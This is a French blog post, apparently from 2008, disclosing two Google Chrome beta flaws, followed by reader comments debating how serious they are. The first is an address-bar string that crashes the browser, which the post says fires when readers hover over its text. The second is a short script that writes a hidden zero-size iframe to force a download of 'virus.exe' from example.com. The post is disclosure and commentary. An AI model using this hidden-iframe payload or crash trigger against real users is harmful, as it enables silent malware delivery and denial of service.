Loading...
Le navigateur de Google reste en version bêta, trop de gens ont tendance à l'oublier ! Surement à cause du fait que trop de sites internet s'affichent en version bêta (et Google est loin d'être le dernier dans ce domaine !).
C'est donc tombé, 2 failles DoS (Denial of Service) pour Google Chrome.
Vous êtes septiques et pensez que ces failles doitvent encore mériter de nombreuses bidouilles ?
1 - La Faille DoS
Ouvre Google Chrome et revenez sur cet article, puis survollez ce texte avec votre souris (le clic n'est même pas nécessaire). Alors heureux ? Ah oui, très heureux 🙂
Le simple fait de mettre "xhark:%" dans la barre d'adresse fait planter Google Chrome (aucun rapport avec moi, vous pouvez mettre "toto%") . Je dis bien Google Chrome et non l'onglet en cours, car Google avait prévu de parquer chaque onglet pour ne pas avoir un navigateur complètement planté à cause d'un seul onglet. Résultat : c'est pas le cas, Chrome plante complètement :
J'ai testé la faille sur XP SP3 et Vista SP1, tous deux impactés.
Le problème vient du fichier chrome.dll (version 0.2.149.27), en fait le navigateur ne comprend pas le type de fichier envoyé et plante.
2 - La faille du téléchargement automatique
Cette faille est beaucoup plus préoccupante que la première... elle permet de forcer un téléchargement sur votre machine, sans aucune confirmation (un exécutable ou virus par exemple), via une simple iframe (fonctionne sur Vista SP1 et XP SP3) :
<script>
document.write('<iframe src="http://www.example.com/virus.exe" frameborder="0" width="0" height="0">');
</script>
Simple mais efficace pour celui qui n'a pas d'antivirus ou autre. Nous pouvons même imaginer de mettre un fichier très lourd, ce qui saturera votre connexion internet. Je pense à nos amis de belgiques qui ont des quotas imposés par leur fournisseurs d'accès (et oui ça existe encore ! 😉 ). Ou encore à celui dont l'ip fera parti d'une liste à surveiller par le gouvernement car via l'iframe le lien contenait un lien vers un site pédophile ou autre...
Bref vous l'aurez compris ce genre de faille n'est pas à prendre à la légère. Voilà qui devrait calmer tous ceux qui ont déjà abandonné leur Firefox ou Opera. Tous deux restent dans le domaine de la sécurité deux gros poids lourds 😉
Pourquoi s'alarmer ?
Ce qui me fait plutôt peur, c'est lorsque je regarde les statistiques du blog au niveau des navigateurs : hier, vous étiez 21,3% à afficher le blog avec Chrome, sûrement pour l'essayer hein 😉 Mais cela veut dire que le nombre de gens utilisant Chrome ne cessera d'augmenter, et que si Google ne réagit pas très rapidement sur ce genre de problèmes Chrome risque très vite d'avoir mauvaise réputation... et vous auriez raison de le penser.
La version de Google Chrome impactée par cette faille est la v. bêta 0.2.149.27.
Faille numéro 1 reconnue par Google
5 commentaires
En réalité la deuxième c'est un exploit pouvant conduire a la prise de controle du pc (avec une backdoor) la première c'est un DOS (crache du pc)
et il y a un autre exploit pour une prise de controle du pc qui est quand a elle crytique (permettant d'éxécuter a distance ce que l'on veut sur le pc.
Pour les deux cités, petite video:
http://bricowifi.blogspot.com/2008/09/google-chrome-video-du-dos-et-de.html
@Wep : "Crash du pc".. mouais, pas super d'accord, c'est crash du navigateur uniquement pour le coup. Quand a "l'exploit pour une prise de controle du PC" je te fais la meme sous IE ou firefox. Que tu clic sur "ouvrir" dans chrome ou sur "ouvrir" dans IE avant le download.. je ne vois vraiment pas la différence. Si les gens sont cons, c'est leur faute.
N'oubliez pas que la plus part des novices possèdent un antivirus et un IE7 😉 et puis enfin, Chrome n'execute en aucun cas les executables téléchargés.
Il me semble que Firefox bloques certaines extensions pour une ouverture directe, en ne proposant que le téléchargement du fichier en question. De toutes façons Firefox le met en cache, donc l'antivirus va quand même se mettre en route, même si on refuse le téléchargement.
Ca n'enlève rien au fait que cette faille reste à corriger 😉
Tout dépend si on appel ça une faille ou non :), car comme tu le précise Xhark, sur Firefox on le sais bien le fichier est charger avant même qu'on dise oui. Or Chrome impose bien un clic volontaire sur "ouvrir" une fois le fichier charger.
Pour ma part, je risque d'en faire rager certain, mais j'apprécie vraiment beaucoup ce "raccourci", j'espère qu'une option permettra de garder cette fonctionnalité dans les prochaines versions
Je pense que le fichier en cache dans Firefox est moins "nocif" qu'un fichier directement dans le disque, au niveau des autorisations d'exécution il ne doit pas pouvoir faire grand chose. En effet on sait bien qu'un virus est capable de se lancer sans même qu'on le lance un exécutable, il peut être lancé juste par le biais de l'antivirus qui va l'analyser et ne pas le reconnaître. Pour Firefox l'antivirus n'analyse pas le cache mais le fichier une fois téléchargé.
Donc je pense que cette différence minime ne l'est pas tant 🙂 après tout ça reste à vérifier...